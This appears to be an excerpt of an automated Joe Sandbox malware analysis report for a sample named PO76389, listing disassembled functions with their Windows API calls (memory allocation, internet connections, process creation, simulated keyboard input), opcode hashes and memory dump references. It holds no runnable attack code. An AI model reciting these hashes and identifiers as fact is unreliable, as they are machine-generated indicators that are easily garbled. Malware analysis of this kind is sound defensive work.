                                                    • Instruction Fuzzy Hash: DFD092705007139FE7209B65E81969A7AF8BF25715F104429E4D5D2650EAF4C884DAA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1a16f05a4aa0b92090575b49b94c4774475c6d084cf5670643f60fec91373a86
                                                    • Instruction ID: 495c99ba5fcb5b9d94ef0d9928b9794def037eab0a9cab807f96e3db150e5d00
                                                    • Opcode Fuzzy Hash: 1a16f05a4aa0b92090575b49b94c4774475c6d084cf5670643f60fec91373a86
                                                    • Instruction Fuzzy Hash: 18C1AD74A0025AEFCB14CFA5C884EAEB7B5FF48305F10859AE901AB251D734FE51CBA5
                                                    APIs
                                                    • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00506AA6), ref: 004BAB2D
                                                    • _wcscmp.LIBCMT ref: 004BAB49
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper_wcscmp
                                                    • String ID:
                                                    • API String ID: 820872866-0
                                                    • Opcode ID: e4c5520e70cd9ccf6063c1d90480c4dcf1b016baad48ae8e805b9abf40e2055b
                                                    • Instruction ID: c452ed8bc6a15da0d651c839a9d130da01336ae6dd5daf9ec8e567b8f2685be6
                                                    • Opcode Fuzzy Hash: e4c5520e70cd9ccf6063c1d90480c4dcf1b016baad48ae8e805b9abf40e2055b
                                                    • Instruction Fuzzy Hash: EAA12771700106DBDB14DF25E9816AEBBB1FF48300F60416BED56C3290DB389871D7AA
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 00510D85
                                                    • CharLowerBuffW.USER32(?,?), ref: 00510DC8
                                                      • Part of subcall function 00510458: CharLowerBuffW.USER32(?,?,?,?), ref: 00510478
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00510FB2
                                                    • _memmove.LIBCMT ref: 00510FC2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: 990c8287266b6f75b68f2e464732258c015afde6e9cd7175210df0b83d139564
                                                    • Instruction ID: 546f507c582d3a314b5d1c248e17cdf05cbadb8f2020c48da34deb5255077ec6
                                                    • Opcode Fuzzy Hash: 990c8287266b6f75b68f2e464732258c015afde6e9cd7175210df0b83d139564
                                                    • Instruction Fuzzy Hash: A5B1AF756043008FC704DF29C480AAABBE5FF88714F14896EF8899B391DB75ED86CB95
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0050AF56
                                                    • CoUninitialize.COMBASE ref: 0050AF61
                                                      • Part of subcall function 004F1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 004F10B8
                                                    • VariantInit.OLEAUT32(?), ref: 0050AF6C
                                                    • VariantClear.OLEAUT32(?), ref: 0050B23F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: 28cbb11bb3b81399aee67483b09f84904c2379b460faf8debbc5b1a03a4ae6ec
                                                    • Instruction ID: 1fc258358625c3457c13aa6f3400380a74272f4a9d7ce194f82c0568a1eae578
                                                    • Opcode Fuzzy Hash: 28cbb11bb3b81399aee67483b09f84904c2379b460faf8debbc5b1a03a4ae6ec
                                                    • Instruction Fuzzy Hash: 02A146392046029FD710DF15C891B5EBBE4BF88324F04441EF995AB3A1DB34ED00CB96
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                    • String ID:
                                                    • API String ID: 3877424927-0
                                                    • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                    • Instruction ID: 0fdffced7ad590d749617e89cad920432d520489334dab08fc18210325794b06
                                                    • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                    • Instruction Fuzzy Hash: E651D630B003059BDF249FAD88A06AF77A1AF81324F24872FFC65967D0D7789D919B49
                                                    APIs
                                                    • GetWindowRect.USER32(00D77500,?), ref: 0051C354
                                                    • ScreenToClient.USER32(?,00000002), ref: 0051C384
                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0051C3EA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: a283aa5cf01b0232632478e96d108285d55695cf6e876888d78fdd626ed98b5a
                                                    • Instruction ID: 4422f4b5c38a6cd6fc3a634d09ccb8b61ab6a904293cf9b8b0eadad0217002cd
                                                    • Opcode Fuzzy Hash: a283aa5cf01b0232632478e96d108285d55695cf6e876888d78fdd626ed98b5a
                                                    • Instruction Fuzzy Hash: 68517B31A00204EFEF20DF68D880AEE7FB6BB55360F248559F8259B290D771ED81DB90
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004ED258
                                                    • __itow.LIBCMT ref: 004ED292
                                                      • Part of subcall function 004ED4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 004ED549
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 004ED2FB
                                                    • __itow.LIBCMT ref: 004ED350
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: ac10ed6756a29d99ca3fe01b8ee66a39b0a56568318168a6c53f3a88a3858757
                                                    • Instruction ID: f439645b11a4d5579c2fe456fd83c06c3b059672f97f1e3e18a1e2803ae372f6
                                                    • Opcode Fuzzy Hash: ac10ed6756a29d99ca3fe01b8ee66a39b0a56568318168a6c53f3a88a3858757
                                                    • Instruction Fuzzy Hash: 0C41E671A00249ABDF11DF56C842BEF7BB9AF58705F00005FFA05A3291DB789A45CB6A
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004FEF32
                                                    • GetLastError.KERNEL32(?,00000000), ref: 004FEF58
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004FEF7D
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004FEFA9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: ffbfd21819aa8bcc5717b89dab6482e33e962ed6582a5706f767f19f20ab4683
                                                    • Instruction ID: d9e8d9f90eeb79a8fa8a86b1af4bcd2cd1b529911bad5e6058e46823663e1982
                                                    • Opcode Fuzzy Hash: ffbfd21819aa8bcc5717b89dab6482e33e962ed6582a5706f767f19f20ab4683
                                                    • Instruction Fuzzy Hash: 64416C39600611DFCB10EF16C544A5ABBF5EF88324B18809EE945AF362DB78FD01DBA5
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0051B3E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: b2e0f4ddab85e807db2bdc24cfadd4ee22b68e5129fa7c248adfe5368fb35810
                                                    • Instruction ID: af682b03fa785d0868b225631e6514240b63fa820b6135b70ed39b564d8cc7b6
                                                    • Opcode Fuzzy Hash: b2e0f4ddab85e807db2bdc24cfadd4ee22b68e5129fa7c248adfe5368fb35810
                                                    • Instruction Fuzzy Hash: 2E319034600204EFFF249E58DC85FE83F66BB05350F54C916FA61D62A2C7B0E9D4AB61
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 0051D617
                                                    • GetWindowRect.USER32(?,?), ref: 0051D68D
                                                    • PtInRect.USER32(?,?,0051EB2C), ref: 0051D69D
                                                    • MessageBeep.USER32(00000000), ref: 0051D70E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: 068cf751805594ce1ed92d983e51dfa1cbba26cc1f0e0f639a3fcdc7093f14e9
                                                    • Instruction ID: ad77445d79938f4c63deb8947b5f10376097fb3f01477646964d718debed4c75
                                                    • Opcode Fuzzy Hash: 068cf751805594ce1ed92d983e51dfa1cbba26cc1f0e0f639a3fcdc7093f14e9
                                                    • Instruction Fuzzy Hash: 85418D35600619DFEB11CF98E884BE9BFF5FB55300F1881AAE4599B291D730E885EB60
                                                    APIs
                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 004F44EE
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 004F450A
                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 004F456A
                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 004F45C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: caff641162b6e27fbbd957de4991be57fbdef9dc00790c18ea8d400e33f1324a
                                                    • Instruction ID: 6f01a0dfa84a084423ed1e51ca9aa0b515a5510356f17a2b6788c06e40031a6f
                                                    • Opcode Fuzzy Hash: caff641162b6e27fbbd957de4991be57fbdef9dc00790c18ea8d400e33f1324a
                                                    • Instruction Fuzzy Hash: 21311271A0025C7BEF20AB6498087BF7BB59B89314F04121BF381923C1CB7C8A49976A
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004E4DE8
                                                    • __isleadbyte_l.LIBCMT ref: 004E4E16
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004E4E44
                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004E4E7A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: d9827d7888c7ad08dead5306605e9f70b43a2422513966afef9670cdf046c3d9
                                                    • Instruction ID: 7fbdcfde6bccf4fc75a3ddda58813ce925c4e715ef4a9248ccfcdf9bcc4b5906
                                                    • Opcode Fuzzy Hash: d9827d7888c7ad08dead5306605e9f70b43a2422513966afef9670cdf046c3d9
                                                    • Instruction Fuzzy Hash: 0631C130600286AFDF219F7ACC45BAB7BB5BF81311F15456AE821872A0E738EC51D794
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00517AB6
                                                      • Part of subcall function 004F69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F69E3
                                                      • Part of subcall function 004F69C9: GetCurrentThreadId.KERNEL32 ref: 004F69EA
                                                      • Part of subcall function 004F69C9: AttachThreadInput.USER32(00000000,?,004F8127), ref: 004F69F1
                                                    • GetCaretPos.USER32(?), ref: 00517AC7
                                                    • ClientToScreen.USER32(00000000,?), ref: 00517B00
                                                    • GetForegroundWindow.USER32 ref: 00517B06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 7748d447e8244f15e2b6b49e458ad6bef6b9951429d2a73ebea6a87c25b376d6
                                                    • Instruction ID: 348339712a9c0a7f1e6253db418b1a347b5ccfdefa815ad76f0ff0ba9b033c36
                                                    • Opcode Fuzzy Hash: 7748d447e8244f15e2b6b49e458ad6bef6b9951429d2a73ebea6a87c25b376d6
                                                    • Instruction Fuzzy Hash: A1310F75D00108AFDB00EFB6D985DEFBBF9EF58314B10806AE815E7211DA759E058BA4
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005049B7
                                                      • Part of subcall function 00504A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00504A60
                                                      • Part of subcall function 00504A41: InternetCloseHandle.WININET(00000000), ref: 00504AFD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 41d120cdf72c1bb7103230b9dc3e3499858004671b3ed49ee71bd54d692555cc
                                                    • Instruction ID: 292d84a00f76bcf0ea2cac8f4ec5bac3890348645a97877a5744fbdda2cdec4f
                                                    • Opcode Fuzzy Hash: 41d120cdf72c1bb7103230b9dc3e3499858004671b3ed49ee71bd54d692555cc
                                                    • Instruction Fuzzy Hash: 0B21C571240605BBDB129F609C05F7FBFBAFB98711F10441AFA0596690EB719814AF64
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004EBCD9
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004EBCE0
                                                    • CloseHandle.KERNEL32(00000004), ref: 004EBCFA
                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004EBD29
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                    • String ID:
                                                    • API String ID: 2621361867-0
                                                    • Opcode ID: 97e018d1497b4e4c7d573fda66d56b2070f84e739b1adf406e47e288de150238
                                                    • Instruction ID: f37c99ab4e50f8c439dd18181343a8346353e68ef65ce7a52e7971bcbb487def
                                                    • Opcode Fuzzy Hash: 97e018d1497b4e4c7d573fda66d56b2070f84e739b1adf406e47e288de150238
                                                    • Instruction Fuzzy Hash: A3217F72104249ABCF029F99ED49FEF7BB9EF04305F104055FE01A2260C77A8D65EBA5
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005188A3
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005188BD
                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005188CB
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005188D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
